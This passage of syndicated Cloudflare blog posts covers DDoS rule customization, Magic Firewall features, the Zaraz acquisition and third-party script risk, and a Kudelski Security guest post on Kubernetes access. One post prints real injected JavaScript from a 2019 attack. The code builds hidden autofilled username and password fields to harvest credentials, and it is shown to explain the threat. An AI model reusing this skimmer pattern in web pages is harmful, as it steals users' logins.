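The masking behavior above can be sketched in a few lines of JavaScript. This is our own toy illustration; the field names, threshold, and detection logic are all simplified assumptions, not Cloudflare's actual system:

```javascript
// Build a detector whose signatures ignore the masked fields, so a flood
// that randomizes source IP/port still collapses onto one counter keyed
// by the fixed TCP sequence number.
function makeDetector(fields, maskedFields, activationThreshold) {
  const counters = new Map();
  return function observe(pkt) {
    const signature = fields
      .filter((f) => !maskedFields.includes(f)) // dynamic masking
      .map((f) => `${f}=${pkt[f]}`)
      .join("|");
    const count = (counters.get(signature) || 0) + 1;
    counters.set(signature, count);
    // Above the activation threshold, a mitigation rule would be compiled
    // and pushed inline; here we just report the action.
    return count >= activationThreshold
      ? { action: "drop", signature }
      : { action: "pass" };
  };
}

// Source IP and port are randomized by the attacker, so we mask them out.
const observe = makeDetector(
  ["srcIp", "srcPort", "dstIp", "seq"],
  ["srcIp", "srcPort"],
  3 // toy activation threshold
);
```

Feeding this detector three spoofed packets that share only a destination IP and sequence number hits the threshold on the third packet, even though every packet has a different source.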

Configuring the DDoS Protection Settings

For now, we’ve only exposed a handful of the Network-layer DDoS protection rules that we’ve identified as the ones most prone to customizations. We will be exposing more and more rules on a regular basis. This shouldn’t affect any of your traffic.

Overriding the sensitivity level and mitigation action

For the Network-layer DDoS Protection ruleset, for each of the available rules, you can override the sensitivity level (activation threshold), customize the mitigation action, and apply expression filters to exclude/include traffic from the DDoS protection system based on various packet fields. You can create multiple overrides to customize the protection for your network and your various applications.
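
As an illustration only, an override sent via the API might carry a body along these lines. The field names here follow the shape of the general Cloudflare Rulesets API and may differ for this ruleset; consult the developer documentation for the authoritative schema:

```json
{
  "overrides": {
    "rules": [
      {
        "id": "<network-layer-ddos-rule-id>",
        "sensitivity_level": "low",
        "action": "block"
      }
    ]
  }
}
```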

Configuring expression fields for the DDoS Managed Rules to match on

In the past, you’d have to go through our support channels to customize the rules. In some cases, this may have taken longer to resolve than desired. With today’s announcement, you can tailor and fine-tune the settings of our autonomous edge system by yourself to quickly improve the accuracy of the protection for your specific network needs.

For the Advanced TCP Protection ruleset, for now, we’ve only exposed the ability to enable or disable it as a whole in the dashboard. To enable or disable the ruleset per IP prefix, you must use the API. At this time, when initially onboarding to Cloudflare, the Cloudflare team must first create a policy for you. After onboarding, if you need to change the sensitivity thresholds, use Monitor mode, or add filter expressions you must contact Cloudflare Support. In upcoming releases, this too will be available via the dashboard and API without requiring help from our Support team.

Pre-existing customizations

If you previously contacted Cloudflare Support to apply customizations, your customizations have been preserved, and you can visit the dashboard to view the settings of the Network-layer DDoS Protection ruleset and change them if you need. If you require any changes to your Advanced TCP Protection customizations, please reach out to Cloudflare Support.

If so far you didn’t have the need to customize this protection, there is no action required on your end. However, if you would like to view and customize your DDoS protection settings, follow this dashboard guide or review the API documentation to programmatically configure the DDoS protection settings.

Helping Build a Better Internet

At Cloudflare, everything we do is guided by our mission to help build a better Internet. The DDoS team’s vision is derived from this mission: our goal is to make the impact of DDoS attacks a thing of the past. Our first step was to build the autonomous systems that detect and mitigate attacks independently. Done. The second step was to expose the control plane over these systems to our customers (announced today). Done. The next step will be to fully automate the configuration with an auto-pilot feature — training the systems to learn your specific traffic patterns to automatically optimize your DDoS protection settings. You can expect many more improvements, automations, and new capabilities to keep your Internet properties safe, available, and performant.

Not using Cloudflare yet? Start now.

Magic Firewall gets Smarter

Post Syndicated from Achiel van der Mandele original https://blog.cloudflare.com/magic-firewall-gets-smarter/

Today, we’re very excited to announce a set of updates to Magic Firewall, adding security and visibility features that are key in modern cloud firewalls. To improve security, we’re adding threat intel integration and geo-blocking. For visibility, we’re adding packet captures at the edge, a way to see packets arrive at the edge in near real-time.

Magic Firewall is our network-level firewall which is delivered through Cloudflare to secure your enterprise. Magic Firewall covers your remote users, branch offices, data centers and cloud infrastructure. Best of all, it’s deeply integrated with Cloudflare, giving you a one-stop overview of everything that’s happening on your network.

A brief history of firewalls

We talked a lot about firewalls on Monday, including how our firewall-as-a-service solution is very different from traditional firewalls and helps security teams that want sophisticated inspections at the Application Layer. When we talk about the Application Layer, we're referring to OSI Layer 7. This means we're applying security features using semantics of the protocol. The most common example is HTTP, the protocol you're using to visit this website. We have Gateway and our WAF to protect inbound and outbound HTTP requests, but what about Layer 3 and Layer 4 capabilities? Layer 3 and 4 refer to the packet and connection levels. These security features aren't applied to HTTP requests, but instead to IP packets and (for example) TCP connections.

A lot of folks in the CIO organization want to add extra layers of security and visibility without resorting to decryption at Layer 7. We're excited to talk to you about two sets of new features that will make your lives easier: geo-blocking and threat intel integration to improve security posture, and packet captures to get you better visibility.

Threat Intel and IP Lists

Magic Firewall is great if you know exactly what you want to allow and block. You can put in rules that match exactly on IP source and destination, as well as bitslicing to verify the contents of various packets. However, there are many situations in which you don’t exactly know who the bad and good actors are: is this IP address that’s trying to access my network a perfectly fine consumer, or is it part of a botnet that’s trying to attack my network?

The same goes the other way: whenever someone inside your network is trying to create a connection to the Internet, how do you know whether it’s an obscure blog or a malware website? Clearly, you don’t want to play whack-a-mole and try to keep track of every malicious actor on the Internet by yourself. For most security teams, it’s nothing more than a waste of time! You’d much rather rely on a company that makes it their business to focus on this.

Today, we’re announcing Magic Firewall support for our in-house Threat Intelligence feed. Cloudflare sees approximately 28 million HTTP requests each second and blocks 76 billion cyber threats each day. With almost 20% of the top 10 million Alexa websites on Cloudflare, we see a lot of novel threats pop up every day. We use that data to detect malicious actors on the Internet and turn it into a list of known malicious IPs. And we don’t stop there: we also integrate with a number of third party vendors to augment our coverage.

To match on any of the threat intel lists, just set up a rule in the UI as normal.

Threat intel feed categories include Malware, Anonymizer and Botnet Command-and-Control centers. Malware and Botnet lists cover properties on the Internet distributing malware and known command and control centers. Anonymizers contain a list of known forward proxies that allow attackers to hide their IP addresses.

In addition to the managed lists, you also have the flexibility of creating your own lists, either to add your own known set of malicious IPs or to make management of your known good network endpoints easier. As an example, you may want to create a list of all your own servers. That way, you can easily block traffic to and from those servers in any rule, without having to replicate the list each time.

Another particularly gnarly problem that many of our customers deal with is geo restrictions. Many are restricted in where they are allowed to (or want to) accept traffic from and send it to. The challenge is that an IP address by itself tells you nothing about its geolocation. Even worse, IP addresses regularly change hands, moving from one country to another.

As of today, you can easily block or allow traffic to any country, without the management hassle that comes with maintaining lists yourself. Country lists are kept up to date entirely by Cloudflare, all you need to do is set up a rule matching on the country and we’ll take care of the rest.

Packet captures at the edge

Finally, we’re releasing a very powerful feature: packet captures at the edge. A packet capture is a pcap file that contains all packets that were seen by a particular network box (usually a firewall or router) during a specific time frame. Packet captures are useful if you want to debug your network: why can’t my users connect to a particular website? Or you may want to get better visibility into a DDoS attack, so you can put up better firewall rules.

Traditionally, you’d log into your router or firewall and start up something like tcpdump. You’d set up a filter to only match on certain packets (packet capture files can quickly get very big) and grab the file. But what happens if you want coverage across your entire network: on-premises, offices and all your cloud environments? You’ll likely have different vendors for each of those locations and have to figure out how to get packet captures from all of them. Even worse, some of them might not even support grabbing packet captures.

With Magic Firewall, grabbing packet captures across your entire network becomes simple: because you run a single network-firewall-as-a-service, you can grab packets across your entire network in one go. This gets you instant visibility into exactly where a particular IP is interacting with your network, regardless of physical or virtual location. You have the option of grabbing all network traffic (warning, it might be a lot!) or setting a filter to only grab a subset. Filters follow the same Wireshark syntax that Magic Firewall rules use:

(ip.src in $cf.anonymizer)
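
A couple more illustrative filters in the same syntax. Here `$my_servers` stands in for a hypothetical custom IP list you might have created; only capture what the filter matches:

```
(ip.src in $cf.botnetcc)
(tcp.dstport == 443 and ip.src in $my_servers)
```

The first would capture only packets arriving from known botnet command-and-control addresses; the second, only HTTPS traffic originating from your own servers.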

We think these are great additions to Magic Firewall, giving you powerful primitives to police traffic and tooling to gain visibility into what's actually going on in your network. Threat Intel, geo-blocking and IP lists are all available today — reach out to your account team to have them activated. Packet captures will enter early access later in December. Similarly, if you're interested, please reach out to your account team!

Why Cloudflare Bought Zaraz

Post Syndicated from Matthew Prince original https://blog.cloudflare.com/why-cloudflare-bought-zaraz/

Today we’re excited to announce that Cloudflare has acquired Zaraz. The Zaraz value proposition aligns with Cloudflare’s mission. They aim to make the web more secure, more reliable, and faster. And they built their solution on Cloudflare Workers. In other words, it was a no-brainer that we invite them to join our team.

Be Careful Who Takes Out the Trash

To understand Zaraz’s value proposition, you need to understand one of the biggest risks to most websites that people aren’t paying enough attention to. And, to understand that, let me use an analogy.

Imagine you run a business. Imagine that business is, I don’t know, a pharmacy. You have employees. They have a process and way they do things. They’re under contract, and you conduct background checks before you hire them. They do their jobs well and you trust them. One day, however, you realize that no one is emptying the trash. So you ask your team to find someone to empty the trash regularly.

Your team is busy and no one has the time to add this to their regular duties. But one plucky employee has an idea. He goes out on the street and flags down a relative stranger. "Hey," your employee says to the stranger. "I've seen you walking by this way every day. Would you mind stopping in and taking out the trash when you do?"

“Uh”, the stranger says. “Sure?!”

“Great,” your employee says. “Here’s a badge that will let you into the building. The trash is behind the secure area of the pharmacy, but, don’t worry, just use the badge, and you can get back there. You look trustworthy. This will work out great!!”

And for a while it does. The stranger swings by every day. Takes out the trash. Behaves exactly as hoped. And no one thinks much about the trash again.

But one day you walk in, and the pharmacy has been robbed. Drugs stolen, patient records missing. Logs indicate that it was the stranger's badge that had been used to access the pharmacy. You track down the stranger, and he says, "Hey, that sucks, but it wasn't me. I handed off that trash responsibility to someone else long ago, when I stopped walking past the pharmacy every day."

And you never track down the person who used the privileged access to violate your trust.

The Keys to the Kingdom

Now, of course, this is crazy. No one would go pick a random stranger off the street and give them access to their physical store. And yet, in the virtual world, a version of this happens all the time.

Every day, front end developers, marketers, and even security teams embed third-party scripts directly on their web pages. These scripts perform basic tasks — the metaphorical equivalent of taking out the trash. When performing correctly, they can be valuable at bringing advanced functionality to sites, helping track marketing conversions, providing analytics, or stopping fraud. But, if they ever go bad, they can cause significant problems and even steal data.

At the most mundane, poorly configured scripts can slow down page rendering. While there are ways to make scripts non-blocking, the unfortunate reality is that their developers don't always follow best practices. Often when we see slow websites, the biggest cause of slowness is all the third-party scripts that have been embedded.

But it can be worse. Much worse. At Cloudflare, we’ve seen this first hand. Back in 2019 a hacker compromised a third-party service that Cloudflare used and modified the third-party JavaScript that was loaded into a page on cloudflare.com. Their aim was to steal login cookies, usernames and passwords. They went so far as to automatically create username and password fields that would autocomplete.

Here’s a snippet of the actual code injected:

        var cf_form = document.createElement("form");
        cf_form.style.display = "none";
        document.body.appendChild(cf_form);
        var cf_email = document.createElement("input");
        cf_email.setAttribute("type", "text");
        cf_email.setAttribute("name", "email");
        cf_email.setAttribute("autocomplete", "username");
        cf_email.setAttribute("id", "_email_");
        cf_email.style.display = "none";
        cf_form.appendChild(cf_email);
        var cf_password = document.createElement("input");
        cf_password.setAttribute("type", "password");
        cf_password.setAttribute("name", "password");
        cf_password.setAttribute("autocomplete", "current-password");
        cf_password.setAttribute("id", "_password_");
        cf_password.style.display = "none";
        cf_form.appendChild(cf_password);

Luckily, this attack caused minimal damage because it was caught very quickly by the team, but it highlights the very real danger of third-party JavaScript. Why should code designed to count clicks even be allowed to create a password field?

Put simply, third-party JavaScript is a security nightmare for the web. What looks like a simple one-line change (“just add this JavaScript to get free page view tracking!”) opens a door to malicious code that you simply don’t control.

Worse still, third-party JavaScript can and does load other JavaScript from other unknown parties. Even if you trust the company whose code you've chosen to embed, you probably don't trust (or even know about!) what they choose to include.

And even worse, these scripts can change at any time. Security threats can come and go. The attacker who went after Cloudflare compromised the third party and modified their service to attack only Cloudflare, and included anti-debugging features to try to stop developers spotting the hack. If you're a CIO and this doesn't freak you out already, ask your web development team how many third-party scripts are on your websites. Do you trust them all?

The practice of adding third-party scripts to handle simple tasks is the literal equivalent of pulling a random stranger off the street, giving them physical access to your office, and asking them to stop by once a day to empty the trash. It’s completely crazy in the physical world, and yet it’s common practice in web development.

Sandboxing the Strangers

At Cloudflare, our solution was draconian. We ordered that all third-party scripts be stripped from our websites. Different teams at Cloudflare were concerned. Especially our marketing team, who used these scripts to assess whether the campaigns they were running were successful. But we made the decision that it was more important to protect the integrity of our service than to have visibility into things like marketing campaigns.

It was around this time that we met the team behind Zaraz. They argued there didn't need to be such a drastic choice. What if, instead, you could strictly control what the scripts you insert on your page do? Make sure that if they were ever compromised they wouldn't have access to anything they weren't authorized to see. Ensure that if they failed or were slow they wouldn't keep a page from rendering.
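
To make the idea concrete, here is a deliberately tiny JavaScript sketch of allowlist-based isolation. It is our own illustration, not how Zaraz is actually implemented: the third-party code is handed a Proxy over an approved API surface, so everything else, cookies and password fields included, is simply unreachable.

```javascript
// Wrap an allowlisted API surface in a Proxy. Anything outside the
// allowlist (document, cookies, network, ...) does not exist from the
// sandboxed script's point of view.
function makeSandbox(allowedApi) {
  return new Proxy(allowedApi, {
    get(target, prop) {
      if (prop in target) return target[prop];
      throw new Error(`Blocked access to "${String(prop)}"`);
    },
    set(_target, prop) {
      throw new Error(`Sandboxed script may not set "${String(prop)}"`);
    },
  });
}

// The vendor script only ever sees `api`, never the real window/document.
const api = makeSandbox({
  trackPageview: (url) => ({ tracked: url }),
});
```

A script given `api` can call `api.trackPageview("/checkout")`, but any attempt to reach `api.document` or create a password field throws immediately instead of silently succeeding.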

We’ve spent the last half year testing Zaraz, and it’s magical. It gives you the best of the flexible, extensible web while ensuring that CIOs and CISOs can sleep well at night knowing that even if a third-party script provider is compromised, it won’t result in a security incident.

To put a fine point on it, had Cloudflare been running Zaraz then the threat from the compromised script we saw in 2019 would have been completely and automatically eliminated. There’s no way for the attacker to create those username and password fields, no access to cookies that are stored in the user’s browser. The attack surface would have been completely removed.

We’ve published two other posts today outlining how Zaraz works as well as examples of how companies are using it to ensure their web presence is secure, reliable, and fast. We are making Zaraz available to our Enterprise customers immediately, and all other customers can access a free beta version on their dashboard starting today.

If you’re a third-party script developer, be on notice that if you’re not properly securing your scripts, then as Zaraz rolls out across more of the web your scripts will stop working. Today, Cloudflare sits in front of nearly 20% of all websites and, before long, we expect Zaraz’s technology will help protect all of them. We want to make sure all scripts running on our customers’ sites meet modern security, reliability, and performance standards. If you need help getting there, please reach out, and we’ll be standing ready to help: [email protected].

In the meantime, we encourage you to read about how the Zaraz technology works and how customers like Instacart are using it to build a better web presence.

It’s terrific to have Zaraz on board, furthering Cloudflare’s mission to help build a better Internet. Welcome to the team. And in that vein: we’d like to welcome you to Zaraz! We’re excited for you to get your hands on this piece of technology that makes the web better.

Cloudflare acquires Zaraz to enable cloud loading of third-party tools

Post Syndicated from Yair Dovrat original https://blog.cloudflare.com/cloudflare-acquires-zaraz-to-enable-cloud-loading-of-third-party-tools/

We are excited to announce the acquisition of Zaraz by Cloudflare, and the launch of Cloudflare Zaraz (beta). What we are releasing today is a beta version of the Zaraz product integrated into Cloudflare's systems and dashboard. You can use it to manage and load third-party tools in the cloud, and achieve significant speed, privacy and security improvements. We have bet on Workers and on Cloudflare's technology and network from day one, and are therefore particularly excited to be offering Zaraz to all of Cloudflare's customers today, free of charge. If you are a Cloudflare customer, all you need to do is click the Zaraz icon on the dashboard and start configuring your third-party stack. No code changes are needed. We plan to keep releasing features over the next couple of months until this beta version is a fully-developed product offering.

It’s time to say goodbye to traditional Tag Managers and Customer Data Platforms. They have done their part, and they have done it well, but as the web evolves they have also created some crucial problems. We are here to solve them.

The problems of third-party bloat

Yo’av and I founded Zaraz after working on opposite sides of the battle over third-party tool implementation. I was working with marketing and product managers who often asked to implement just one more analytics tool on the website, while Yo’av was a developer trying to push back due to the performance hit and security risks involved.

We started building Zaraz after talking to hundreds of frustrated engineers from all around the world. It all started when we joined Y Combinator in the winter of 2020. We were then working on a totally different product: QA software for web analytics tools. In every pitch to a new customer, we would show a list of the tools being loaded on that customer’s site, along with a list of implementation bugs related to those tools. We kept hearing the same somewhat unrelated questions over and over: “How come we load so many third-party tools? Are these causing a slowdown? Does it affect SEO? How could I protect my users if one of these tools were hacked?” No one really cared about QA. Engineers asked about the ever-increasing performance hit and security risk caused by third-party tools.

We were not sure about the answers to these questions, but we realized there might be something bigger hidden behind them. So we decided to do some research. We built a bot and scanned the 5,000 most-visited domains in the US, loading each with and without third-party tools and comparing the results. On average, third-party tools were slowing down the web by 40%. In the mid-2010s, a few years after Google released Tag Manager, engineers often asked us whether adding Google Tag Manager (GTM) would slow down their website. No one had a clear answer back then. Google’s official answer was that GTM loads asynchronously, and therefore should not slow the loading of the “user-visible parts” of the page. We have since learned that’s not at all accurate.

Although Google is pushing the market to launch faster websites, its own stack is often what causes the bloat. If you have ever used Google PageSpeed Insights, you might have noticed Google pointing out its own tools as problematic in the diagnostics section. Even on Google’s Merchandise Store, which uses mostly Google’s stack of tools (GTM, Analytics, Ads, DoubleClick, etc.), third-party tools block the main thread for roughly four seconds. GTM itself is responsible for blocking for more than one second. The latest developments in the field, like the invention of Customer Data Platforms, have only made it worse, as more third-party code is now being evaluated and run in the browser than ever before.

The median website in 2021 uses 21 third-party solutions on mobile and 23 on desktop, while in the 90th percentile, these numbers climb to a shocking 89 third-party solutions on mobile and 91 on desktop. The moment you load tens of third-party tools, your website is going to be slow. It will damage important metrics like Total Blocking Time, Time to Interactive, and more. It is, in fact, a losing battle.

In an era where everything happens online, speed is a competitive advantage: a faster website affects the bottom line and beats the competition. The latest data published by Google and Deloitte showed that a mere 0.1 second improvement in load time can influence every step of the user journey, ultimately increasing conversion rates by up to 10% across different industries. Furthermore, Google announced Core Web Vitals last year, a set of speed metrics that affect your SEO rankings.

This multiplicity of tools exposes websites to severe security and privacy threats as well. Since most tools load remote JavaScript resources, customers can’t keep track of what’s being loaded on their website. And if that’s not enough, many third-party tools call other third-party resources, or redirect HTTP requests to endpoints you never knew existed. This bad practice exposes your users to malicious threats and too often violates privacy ethics. With the adoption of GDPR, CCPA, and other regulations, that is a painful problem to have.

Trends are pointing towards a big change in how we use third parties today, especially advertising and marketing tools. Mainstream browsers are enforcing strict built-in limitations on the usage of third-party cookies, and the public is raising concerns about privacy and user consent. It’s only a matter of time until marketing and advertising tools are forced to drop third-party cookies altogether. It will then make sense for them to open up their APIs and allow cloud loading for customers, and companies will need an easy-to-use infrastructure to make this shift. Building this infrastructure on the edge only makes sense, as it needs to run as close as possible to the end user to be performant.

Make your website faster and more secure with Zaraz!

Zaraz can significantly boost a website’s performance by optimizing how it loads third-party tools. Every tool we support is a bit different, but the main idea is to run whatever we can on our cloud backend instead of in the browser. Using the dashboard, customers can implement any type of third-party solution: interactive widgets, analytics tools, advertising tools, marketing automation, CRM tools, etc. The beta version includes a library of 18 third-party tools that you can integrate into your website. In a few clicks, you can start loading a tool entirely on the cloud, without any JavaScript running on the browsers of your end-users. You can learn more about our unique technology in a blog post written by Yo’av Moshe, our CTO.

Moving the execution of third-party scripts away from the browser has a significant impact on page loading times, simply because less code is running in the browser. It also creates an extra layer of security and control over Personally Identifiable Information, Protected Health Information, and other sensitive data that is often unintentionally passed to third-party vendors. And in case your site does include some third-party resources, later today Cloudflare will announce Page Shield, a solution to protect your website from the risks they pose. The two products offer a holistic solution to third-party security and privacy threats.

For customers that would like to test more complex integrations, we offer an Events API, and a set of pre-set variables you can use. This way you can measure conversions or any action taken on your website with context. For current Google Tag Manager users, we have good news: Zaraz offers dataLayer backward compatibility out-of-the-box. You can easily switch from GTM to Zaraz, without needing to change anything in your code base. In the near future we will make it easy to import your current GTM configuration into Zaraz as well.
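For illustration, here is a minimal sketch of what that backward compatibility could look like in page code. The event name and fields below are made-up examples, not part of any specific integration:

```javascript
// Minimal sketch of Zaraz's dataLayer backward compatibility.
// The 'purchase' event and its fields are hypothetical examples.
var dataLayer = globalThis.dataLayer || (globalThis.dataLayer = []);

// Existing GTM-style tracking code keeps working unchanged:
dataLayer.push({ event: 'purchase', value: 42.5, currency: 'USD' });

// The equivalent call through the Zaraz Events API. zaraz is only
// defined on pages where Zaraz is enabled, hence the guard:
if (typeof zaraz !== 'undefined') {
  zaraz.track('purchase', { value: 42.5, currency: 'USD' });
}
```

Because the dataLayer pattern is preserved, a site switching from GTM can leave existing pushes in place and adopt the Events API incrementally.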

Instacart achieves 0 ms Blocking Time and increases security with Zaraz

“Leveraging Zaraz, Instacart was able to significantly improve performance of our Shopper-specific domains with minimal changes required to the overall site. We had made numerous optimizations to https://shoppers.instacart.com/ but identified third-party tools as the next issue when it came to performance impact. With Zaraz we optimized third-party load times and using Cloudflare Workers we kept the integration on our own subdomain, keeping control of visibility and security.”
Marc Barry, Staff Software Engineer, Cloud Foundations at Instacart

No one is more suitable to speak about the benefits of using Zaraz than our customers. Instacart, the leading online grocery platform in North America, has decided to test Zaraz on their shoppers.instacart.com domain. They had two objectives: to increase security and privacy, and to boost page speed (more specifically to improve Total Blocking Time).

For the security and privacy part, the fact that Zaraz, by default, saves no information whatsoever about the end-user, but merely acts as a pipeline, played an important part in their decision to test it. And by preventing third-party scripts from running directly on the browser, they intended to diminish the security risk involved in using third-party tools. To gain even more control, they have decided to use Cloudflare Workers to proxy all the requests to and from the Zaraz service, through their shoppers.instacart.com sub-domain. This gives them complete visibility and control over the process of sending data to third-parties, including Zaraz itself.

Instacart is one of the most tech-savvy companies in the world, and the Shoppers sub-domain was already fast compared to other websites. They had done a lot to improve its speed metrics before, but they had reached a point where third-party scripts were the main thing slowing it down.

[Graph: mobile speed metrics for shoppers.instacart.com, before and after Zaraz]

As presented in the graph above, launching Zaraz significantly improved page speed for mobile devices. Total Blocking Time decreased from 500 ms to 0 ms. Time to Interactive was improved by 63%, decreasing from 11.8 to 4.26 seconds. CPU Time improved by 60%, from 3.62 seconds to 1.45 seconds. And JavaScript weight shrank by 63%, from 448 KB to 165 KB.

We measured significant improvements on the desktop as well. Total Blocking Time decreased from 65 ms to 0 ms. Time to Interactive was improved by 23%, decreasing from 1.64  to 1.26 seconds. CPU Time improved by 55%, from 1.57 seconds to 0.7 seconds. And the JavaScript weight improved by the same amount — from 448 KB to 165 KB.

With more and more industry leaders like Instacart starting to offload tools to the cloud, it’s only a matter of time until most SaaS vendors and startups start building server-side integrations as complete solutions that run on the edge. Third-party vendors never meant to do harm; they simply lacked the tools to build scalable integrations on the edge. Together with Instacart, we had a chance to connect directly with some vendors, collaborate, and work on finding the most optimized solutions. Moving forward, we are going to put a lot of effort into collaborating with SaaS companies and vendors, and into offering them an easy way to build solutions on the edge. Stay tuned!

The future of Zaraz as a platform

Today marks an important milestone in our company’s life. Our team is happy to join Cloudflare’s office in Portugal where we will keep leading the product development of Zaraz. As part of Cloudflare, we will turn Zaraz into a platform on which third-party vendors can easily build tools and leverage Cloudflare’s global network capabilities. We will lead the entire industry toward adoption of server-side loading of third-party tools and will make it possible for everyone to build better, faster and more secure products easily.

The fact that Zaraz was running entirely on Workers, even before we joined Cloudflare, made the integration simple and fast. As a result, we can quickly move on to building new features until we reach a complete offering and general availability. Cloudflare’s unique, in-house abilities will enable us to make Zaraz even more robust and simplify the onboarding process of new customers. One big improvement we have already achieved is that Cloudflare customers don’t need to make any code changes to use Zaraz. Once it is toggled on, our script will be in-lined directly in the <head> of the HTML. Another exciting point is that the entire service is now running on your own domain.

Furthermore, we are planning to leverage Cloudflare’s expertise to expand our feature set and help our customers deal with more security threats and privacy risks presented by third-party code. One example is adding geolocation triggers, to make it possible to load different tools to end-users who visit your website from different parts of the world. This is needed to stay compliant with different regulations. Another example is the Data Loss Prevention feature, currently used by several of our enterprise customers. The DLP feature scans every request that’s going to a third-party endpoint, to make sure it doesn’t include sensitive information such as names, email addresses, SSN, etc. There are plenty more features in the pipeline.
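To make the idea concrete, here is an illustrative sketch (not Zaraz’s actual implementation) of what scanning an outbound payload for sensitive patterns could look like. The pattern names and regular expressions are deliberately simplistic examples:

```javascript
// Illustrative DLP-style scan: check an outbound payload for sensitive
// patterns before it is forwarded to a third-party endpoint.
// These patterns are simplified examples, not production-grade detectors.
const PATTERNS = {
  email: /[\w.+-]+@[\w-]+\.[\w.]+/,
  ssn: /\b\d{3}-\d{2}-\d{4}\b/,
};

// Returns the names of all patterns found anywhere in the payload.
function findSensitive(payload) {
  const text = JSON.stringify(payload);
  return Object.keys(PATTERNS).filter((name) => PATTERNS[name].test(text));
}

console.log(findSensitive({ user: 'jane@example.com', score: 7 })); // → [ 'email' ]
```

A real implementation would run server-side on every request to a third-party endpoint and block or redact matches rather than just report them.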

An influential company like Cloudflare will help us drive positive change in the market, pushing vendors to build on the edge, and companies to adopt cloud loading. We plan to extend our SDK to enable all third-party vendors to build their integrations on our platform and easily run their solutions on the edge, using Workers. Together with Cloudflare, we will play a leading role in the shift to cloud loading of third-party code. It’s time to say goodbye to Tag Managers and Customer Data Platforms. This announcement marks the end of an era. In no time, we are all going to enjoy a browsing experience that’s 40% faster, simply by optimizing how websites load third-party tools.

Offering Zaraz to the millions of Cloudflare users around the world takes us one step further towards achieving our goal: making the Internet faster and safer, for everyone. We believe that the user experience of any website, small or large, should not be degraded by the use of analytics, chatbots, or any other third-party tool. These tools should improve the user experience, not impair it. We are excited by this future, and we won’t rest until the entire web shifts to cloud loading of third-party tools, freeing the browser to do what it was initially designed to do: loading websites.

If you would like to explore the free beta version, please click here. If you are an enterprise and have additional/custom requirements, please click here to join the waitlist. To join our Discord channel, click here.

Guest Blog: k8s tunnels with Kudelski Security

Post Syndicated from Guest Author original https://blog.cloudflare.com/guest-blog-zero-trust-access-kubernetes/

Today, we’re excited to publish a blog post written by our friends at Kudelski Security, a managed security services provider. A few weeks back, Romain Aviolat, the Principal Cloud and Security Engineer at Kudelski Security, approached our Zero Trust team with a unique solution to a difficult problem: ensuring secure application access in remote working environments. Their solution is powered by Cloudflare’s Identity-aware Proxy, which we call Cloudflare Tunnel.

We enjoyed learning about their solution so much that we wanted to amplify their story. In particular, we appreciated how Kudelski Security’s engineers took full advantage of the flexibility and scalability of our technology to automate workflows for their end users. If you’re interested in learning more about Kudelski Security, check out their work below or their research blog.

Zero Trust Access to Kubernetes

Over the past few years, Kudelski Security’s engineering team has prioritized migrating our infrastructure to multi-cloud environments. Our internal cloud migration mirrors what our end clients are pursuing and has equipped us with expertise and tooling to enhance our services for them. Moreover, this transition has provided us an opportunity to reimagine our own security approach and embrace the best practices of Zero Trust.

So far, one of the most challenging facets of our Zero Trust adoption has been securing access to our different Kubernetes (K8s) control-plane APIs across multiple cloud environments. Initially, our infrastructure team struggled to gain visibility and apply consistent, identity-based controls to the APIs of different K8s clusters. Additionally, when interacting with these APIs, our developers were often left blind as to which clusters they needed to access and how to do so.

To address these frictions, we designed an in-house solution leveraging Cloudflare to automate how developers could securely authenticate to K8s clusters sitting across public cloud and on-premise environments. Specifically, for a given developer, we can now surface all the K8s services they have access to in a given cloud environment, authenticate an access request using Cloudflare’s Zero Trust rules, and establish a connection to that cluster via Cloudflare’s Identity-aware proxy, Cloudflare Tunnel.

Most importantly, this automation tool has enabled Kudelski Security as an organization to enhance our security posture and improve our developer experience at the same time. We estimate that this tool saves a new developer at least two hours of time otherwise spent reading documentation, submitting IT service tickets, and manually deploying and configuring the different tools needed to access different K8s clusters.

In this blog, we detail the specific pain points we addressed, how we designed our automation tool, and how Cloudflare helped us progress on our Zero Trust journey in a work-from-home friendly way.

Challenges securing multi-cloud environments

As Kudelski Security has expanded our client services and internal development teams, we have inherently expanded our footprint of applications within multiple K8s clusters and multiple cloud providers. For our infrastructure engineers and developers, the K8s cluster API is a crucial entry point for troubleshooting. We work in GitOps and all our application deployments are automated, but we still frequently need to connect to a cluster to pull logs or debug an issue.

However, maintaining this diversity creates complexity and pressure for infrastructure administrators. For end users, sprawling infrastructure can translate to different credentials, different access tools for each cluster, and different configuration files to keep track of.

Such a complex access experience can make real-time troubleshooting particularly painful. For example, on-call engineers trying to make sense of an unfamiliar K8s environment may dig through dense documentation or be forced to wake up other colleagues to ask a simple question. All this is error-prone and a waste of precious time.

Common, traditional approaches to securing access to K8s APIs presented challenges we knew we wanted to avoid. For example, we felt that exposing the API to the public internet would inherently increase our attack surface; that’s a risk we couldn’t afford. Moreover, we did not want to provide broad-based access to our clusters’ APIs via our internal networks and condone the risks of lateral movement. As Kudelski continues to grow, the operational costs and complexity of deploying VPNs across our workforce and different cloud environments would lead to scaling challenges as well.

Instead, we wanted an approach that would allow us to maintain small, micro-segmented environments, small failure domains, and no more than one way to give access to a service.

Leveraging Cloudflare’s Identity-aware Proxy for Zero Trust access

To do this, Kudelski Security’s engineering team opted for a more modern approach: creating connections between users and each of our K8s clusters via an Identity-aware Proxy (IAP). IAPs are flexible to deploy and add an additional layer of security in front of our applications by verifying the identity of a user when an access request is made. Further, they support our Zero Trust approach by creating connections from users to individual applications — not entire networks.

Each cluster has its own IAP and its own sets of policies, which check for identity (via our corporate SSO) and other contextual factors like the device posture of a developer’s laptop. The IAP doesn’t replace the K8s cluster authentication mechanism, it adds a new one on top of it, and thanks to identity federation and SSO this process is completely transparent for our end users.

In our setup, Kudelski Security is using Cloudflare’s IAPs as a component of Cloudflare Access — a ZTNA solution and one of several security services unified by Cloudflare’s Zero Trust platform.

For many web-based apps, IAPs help create a frictionless experience for end users requesting access via a browser. Users authenticate via their corporate SSO or identity provider before reaching the secured app, while the IAP works in the background.

That user flow looks different for CLI-based applications because we cannot redirect CLI network flows like we do in a browser. In our case, our engineers want to use their favorite K8s clients which are CLI-based like kubectl or k9s. This means our Cloudflare IAP needs to act as a SOCKS5 proxy between the CLI client and each K8s cluster.

To create this IAP connection, Cloudflare provides a lightweight server-side daemon called cloudflared that connects infrastructure with applications. This encrypted connection runs on Cloudflare’s global network where Zero Trust policies are applied with single-pass inspection.

Without any automation, however, Kudelski Security’s infrastructure team would need to distribute the daemon on end user devices, provide guidance on how to set up those encrypted connections, and take other manual, hands-on configuration steps and maintain them over time. Plus, developers would still lack a single pane of visibility across the different K8s clusters that they would need to access in their regular work.

Our automated solution: k8s-tunnels!

